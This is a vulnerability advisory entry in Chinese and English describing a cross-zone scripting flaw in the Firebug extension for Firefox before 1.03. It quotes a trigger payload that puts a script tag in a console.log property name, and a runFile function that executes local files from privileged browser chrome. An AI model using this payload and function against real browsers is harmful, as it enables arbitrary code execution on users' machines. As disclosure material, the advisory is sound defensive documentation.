中文描述:

FireBug是一个非常实用的JavaScript以及DOM查看调试工具，是Firefox的一个插件。 FireBug的对脚本代码的处理实现上存在漏洞，远程攻击者可能利用此漏洞在用户机器上执行恶意脚本代码。 在浏览器中远程脚本是受到沙盒限制的，也就是任何http:或https:前缀的URL都是安全的。浏览器扩展使用chrome: protocol，这个协议不受任何限制，因此浏览器扩展都是受信任的。如果远程脚本诱骗浏览器对chrome:执行JavaScript表达式的话，这个脚本就可以完全控制整个chrome及操作系统，因为命令执行和读写访问都是允许的。 如果要导致Firebug执行跨站脚本，可执行以下操作： console.log({'<script>alert("bing!")</script>':'exploit'}) 如果将这段JavaScript表达式嵌入到页面并使用安装了Firebug的浏览器打开，用户就会得到一个警告窗，这时攻击者可以向浏览器chrome中注入以下函数： function runFile(f) { var file = Components.classes["@mozilla.org/file/local;1"] .createInstance(Components.interfaces.nsILocalFile); file.initWithPath(f); var process = Components.classes["@mozilla.org/process/util;1"] .createInstance(Components.interfaces.nsIProcess); process.init(file); var argv = Array.prototype.slice.call(arguments, 1); process.run(true, argv, argv.length); } runFile函数允许执行文件。通过浏览器chrome中的函数声明，攻击者就可以多次调用console.log以生成任意文件，甚至暗中安装浏览器扩展，以及读写文件。

英文描述:

Cross-zone scripting vulnerability in the DOM templates (domplates) used by the console.log function in the Firebug extension before 1.03 for Mozilla Firefox allows remote attackers to bypass zone restrictions, read arbitrary file:// URIs, or execute arbitrary code in the browser chrome, as demonstrated via the runFile function, related to lack of HTML escaping in the property name.

CWE类型:

标签:

中文解决方案:

英文解决方案:

临时解决方案: